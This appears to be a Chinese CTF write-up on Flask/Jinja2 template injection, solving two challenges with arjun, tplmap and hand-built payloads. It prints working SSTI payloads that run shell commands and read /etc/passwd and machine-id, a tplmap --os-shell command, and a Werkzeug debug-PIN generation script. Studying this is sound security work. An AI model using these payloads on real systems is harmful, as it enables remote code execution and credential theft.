工具
1.arjun
可以扫描网页可以传递的参数
2.tplmap
类似sqlmap,可以扫描模板注入漏洞
3.获取eval函数并执行任意python代码的POC:
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("id").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
[RootersCTF2019]I_<3_Flask
进入,使用arjun扫描
发现name参数
存在回显
方法一
使用tqlmap
python tplmap.py -u http://954f248d-c586-4b47-b18b-819c586be39d.node4.buuoj.cn:81/?name=233
存在注入漏洞,并且可以链接shell
连接
>python tplmap.py -u http://954f248d-c586-4b47-b18b-819c586be39d.node4.buuoj.cn:81/?name=233 --os-shell
成功连接,拿到flag
方法二
自己手动尝试
存在flask模板注入
构造paylaod
?name={{''.__class__.__base__.__subclasses__()}}
搜索敏感词
发现存在popen方法
通过脚本确定是数组第222个元素,继续构造paylaod
?name={{''.__class__.__base__.__subclasses__()[222].__init__.__globals__['os'].popen('类似').read()}}
拿到shell
直接cat flag.txt
[GYCTF2020]FlaskApp
题目是一个base64 加密解密的程序。
多次尝试之后发现页面开启了flask的debug模式 ,解码的地方输入1进入debug。
在debug有源码泄露
可以看到存在ssti模板注入
文件路径也暴露了
发现不能命令执行,尝试读取文件
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd', 'r').read() }}{% endif %}{% endfor %}
在解密页面用过base64加密传入
可以看到用户应该为flaskweb 或者root,由于flag文件路径未知,便尝试获得此debug的pin码从而得到一个python的交互式shell
Mac地址:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/sys/class/net/eth0/address', 'r').read() }}{% endif %}{% endfor %}
机器id:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/machine-id', 'r').read() }}{% endif %}{% endfor %}
对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件,windows的id获取跟linux也不同。
对于docker机则读取/proc/self/cgroup:
运行脚本获取pin码(kingkk师傅的exp):
import hashlib
from itertools import chain
probably_public_bits = [
'flaskweb',# username用户名,可以通过查看/etc/passwd查看
'flask.app',# modname程序名
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))对象名
'/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),绝对路径
]
private_bits = [
'213487284563069',# str(uuid.getnode()), /sys/class/net/ens33/address或者/sys/class/net/eth0/address(最后一级目录不太确定) mac地址的十进制表达式
'1408f836b0ca514d796cbf8960e45fa1'# get_machine_id(), /etc/machine-id 首先尝试读取/etc/machine-id或者 /proc/sys/kernel/random/boot_i中的值,若有就直接返回假如是在win平台下读取不到上面两个文件,就去获取注册表中SOFTWARE\\Microsoft\\Cryptography的值,并返回
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
运行
进入shell
拿到flag(ps:目录里/n是一个整体)